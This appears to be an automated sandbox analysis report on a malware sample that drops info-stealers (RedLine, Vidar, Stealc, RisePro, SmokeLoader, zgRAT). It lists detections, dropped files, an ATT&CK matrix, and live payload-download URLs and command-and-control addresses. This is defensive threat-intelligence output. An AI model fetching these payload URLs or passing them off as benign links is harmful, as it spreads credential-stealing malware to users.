Source: Yara match	File source: 00000000.00000003.1788980748.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1837525388.0000000000362000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695276080.000002962602B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Start[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.522aa90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cTThtD77H613MBNsXAevJo07.exe.3685570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.522aa90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cTThtD77H613MBNsXAevJo07.exe.3685570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.51a3660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.51a3660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.4e727d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2297847494.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2040474083.0000000005188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2195916450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2040474083.0000000004E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cTThtD77H613MBNsXAevJo07.exe PID: 7616, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 0000000F.00000002.2622383626.0000000004770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2393333451.0000000004877000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2FN_tSqExD_WAZJi52lCzdU.zip, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c67dc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c971f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fq9BbqPKEgDrDHrc1Aru5zuA.exe.3a15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c971f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c67dc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fq9BbqPKEgDrDHrc1Aru5zuA.exe.3a15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.2173995104.0000000005890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2045291964.0000000003C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2038976319.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2895958085.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2045291964.0000000003C38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2334904925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2381027828.0000000000F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fq9BbqPKEgDrDHrc1Aru5zuA.exe PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B6410 bind,WSAGetLastError,	12_2_659B6410
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B60B0 listen,WSAGetLastError,	12_2_659B60B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659BC030 sqlite3_bind_parameter_count,	12_2_659BC030
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659BC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	12_2_659BC050
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B6070 PR_Listen,	12_2_659B6070
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B63C0 PR_Bind,	12_2_659B63C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659422D0 sqlite3_bind_blob,	12_2_659422D0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A90D60 sqlite3_bind_parameter_name,	12_2_65A90D60
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A90C40 sqlite3_bind_zeroblob,	12_2_65A90C40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	51 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	22 Native API	11 Windows Service	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	1 Bypass User Account Control	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	14 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	Login Hook	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	459 System Information Discovery	Distributed Component Object Model	1 Credential API Hooking	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 Command and Scripting Interpreter	Network Logon Script	11 Windows Service	33 Software Packing	LSA Secrets	1 Query Registry	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	911 Process Injection	1 Timestomp	Cached Domain Credentials	1391 Security Software Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	1 Service Execution	Startup Items	1 Scheduled Task/Job	1 DLL Side-Loading	DCSync	781 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Bypass User Account Control	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	781 Virtualization/Sandbox Evasion	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	911 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
i1crvbOZAP.exe	28%	Virustotal		Browse
i1crvbOZAP.exe	42%	ReversingLabs	Win64.Trojan.Znyonm
i1crvbOZAP.exe	100%	Avira	HEUR/AGEN.1304084

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\AFCBAEBAEB.exe	100%	Joe Sandbox ML
C:\ProgramData\AFCBAEBAEB.exe	54%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\AFCBAEBAEB.exe	43%	Virustotal		Browse
C:\ProgramData\DBKKFCBAKK.exe	46%	ReversingLabs	Win64.Trojan.CrypterX
C:\ProgramData\DBKKFCBAKK.exe	41%	Virustotal		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	88%	ReversingLabs	Win64.Trojan.Privateloader
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	66%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\HTML Professional Kit\is-EPH22.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\is-KPHSL.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\is-MJB4L.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\is-N48NI.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\is-Q84B1.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\is-SG0PM.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\libbz2-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\libgcc_s_dw2-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\libogg-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\libvorbis-0.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\HTML Professional Kit\libwinpthread-1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	88%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Arab[1].exe	28%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Ledger-Live[1].exe	78%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer[1].exe	30%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sqlm[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft[1].exe	46%	ReversingLabs	Win64.Trojan.CrypterX

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bitbucket.org	0%	Virustotal	Browse
kilojagger.com	1%	Virustotal	Browse
cybervincent.com	2%	Virustotal	Browse
s3-w.us-east-1.amazonaws.com	0%	Virustotal	Browse
ps.userapi.com	0%	Virustotal	Browse
ngovpn.com	17%	Virustotal	Browse
sun6-20.userapi.com	1%	Virustotal	Browse
iplogger.org	0%	Virustotal	Browse
294anacamptometer.sbs	0%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
ipinfo.io	0%	Virustotal	Browse
sun6-22.userapi.com	0%	Virustotal	Browse
monoblocked.com	14%	Virustotal	Browse
api.myip.com	0%	Virustotal	Browse
centrosmissextensions.com	3%	Virustotal	Browse
d.392391234.xyz	4%	Virustotal	Browse
triedchicken.net	18%	Virustotal	Browse
carthewasher.net	14%	Virustotal	Browse
vk.com	0%	Virustotal	Browse
act.fishoaks.net	18%	Virustotal	Browse
db-ip.com	0%	Virustotal	Browse
sun6-21.userapi.com	1%	Virustotal	Browse
nidoe.org	14%	Virustotal	Browse
psv4.userapi.com	4%	Virustotal	Browse
bbuseruploads.s3.amazonaws.com	4%	Virustotal	Browse
iplis.ru	11%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection
bitbucket.org	18.205.93.0	true	false	0%, Virustotal, Browse
monoblocked.com	45.130.41.108	true	false	14%, Virustotal, Browse
ps.userapi.com	87.240.190.89	true	false	0%, Virustotal, Browse
cybervincent.com	104.21.36.53	true	false	2%, Virustotal, Browse
sun6-21.userapi.com	95.142.206.1	true	false	1%, Virustotal, Browse
iplogger.org	172.67.132.113	true	false	0%, Virustotal, Browse
kilojagger.com	172.67.218.160	true	false	1%, Virustotal, Browse
ngovpn.com	130.164.189.20	true	false	17%, Virustotal, Browse
sun6-20.userapi.com	95.142.206.0	true	false	1%, Virustotal, Browse
s3-w.us-east-1.amazonaws.com	52.216.219.33	true	false	0%, Virustotal, Browse
api.myip.com	104.26.9.59	true	false	0%, Virustotal, Browse
294anacamptometer.sbs	104.21.42.248	true	false	0%, Virustotal, Browse
carthewasher.net	104.21.82.182	true	false	14%, Virustotal, Browse
steamcommunity.com	23.47.27.74	true	true	0%, Virustotal, Browse
ipinfo.io	34.117.186.192	true	false	0%, Virustotal, Browse
sun6-22.userapi.com	95.142.206.2	true	false	0%, Virustotal, Browse
act.fishoaks.net	104.21.22.54	true	false	18%, Virustotal, Browse
nidoe.org	37.255.238.137	true	true	14%, Virustotal, Browse
d.392391234.xyz	95.164.45.22	true	true	4%, Virustotal, Browse
centrosmissextensions.com	162.19.138.79	true	false	3%, Virustotal, Browse
triedchicken.net	172.67.180.119	true	false	18%, Virustotal, Browse
db-ip.com	104.26.4.15	true	false	0%, Virustotal, Browse
vk.com	93.186.225.194	true	false	0%, Virustotal, Browse
iplis.ru	104.21.63.150	true	false	11%, Virustotal, Browse
bbuseruploads.s3.amazonaws.com	unknown	unknown	true	4%, Virustotal, Browse
psv4.userapi.com	unknown	unknown	true	4%, Virustotal, Browse

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
5.42.65.0:29587	true
https://sun6-21.userapi.com/c909328/u329118071/docs/d30/0bb5ce760b73/XFilePumper.bmp?extra=LfaiwsuY5AI1SgCQ2hZu1AgxBMymxLFFBDyOdai5jngk90oTeFijtt7Ic4wsMIEOy9NwgH9QmImjTPk5bd8yAGOmRqX65U99IViGTY1ZCiw1fayo7Fo0G4owW8CZYZOPW10clBZcrnDnQ8o	false
https://294anacamptometer.sbs/bjhgvfd	false
http://ngovpn.com/share/index.php	false
http://sodez.ru/tmp/index.php	true
https://78.46.229.36/	false
http://185.172.128.26/8e6d9db21fb63946/nss3.dll	true
https://db-ip.com/demo/home.php?s=102.165.48.43	false
https://78.46.229.36/softokn3.dll	false
https://78.46.229.36/nss3.dll	false
http://185.172.128.26/8e6d9db21fb63946/vcruntime140.dll	true
https://vk.com/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12	false
https://78.46.229.36/vcruntime140.dll	false
http://uama.com.ua/tmp/index.php	true
http://185.172.128.26/8e6d9db21fb63946/msvcp140.dll	true
http://195.20.16.46/download/123p.exe	false
https://centrosmissextensions.com/Soft.exe	false
https://monoblocked.com/525403/setup.exe	false

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2021400787.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	false
https://vk.com/doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07ZxaF	i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C64000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2021400787.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	false
https://psv4.userapi.com/i	i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp	false
https://sun6-22.userapi.com/c909218/u329118071/docs/d56/4889f8ef891f/crypted.bmp?extra=-LBKaniv3MRw0	i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AA8000.00000004.00000020.00020000.00000000.sdmp	false
https://vk.com:80/doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdB	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://psv4.userapi.com/T	i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CD1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623CD5000.00000004.00000020.00020000.00000000.sdmp	false
https://papi.vk.com/pushsse/ruim	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://bbuseruploads.s3.amazonaws.com/e14c6eb6-712a-4c2e-be84-37a1de2550e3/downloads/ddaff67e-23e9-	i1crvbOZAP.exe, 00000000.00000003.1684844522.0000029625C07000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685587384.0000029625BF6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1696291865.0000029625BFD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1691374436.0000029625C05000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1696637430.0000029625BBB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1729367177.0000029625BF5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625A4D000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1689167578.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1704836017.0000029625BF4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1792902048.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1816528616.0000029625C05000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1689597827.0000029625C07000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1779272376.0000029625BE9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	false
https://vk.com:80/doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07Z	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/dist/web/docs.20074c02.css	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://bitbucket.org/ixef571134343/ef571134343/downloads/Start.exeC:	i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
https://vk.com	i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625A97000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/dist/web/chunks/audioplayer-lib.93b52d88.css	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://www.instagram.com	i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.26/8e6d9db21fb63946/msvcp140.dlli	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false
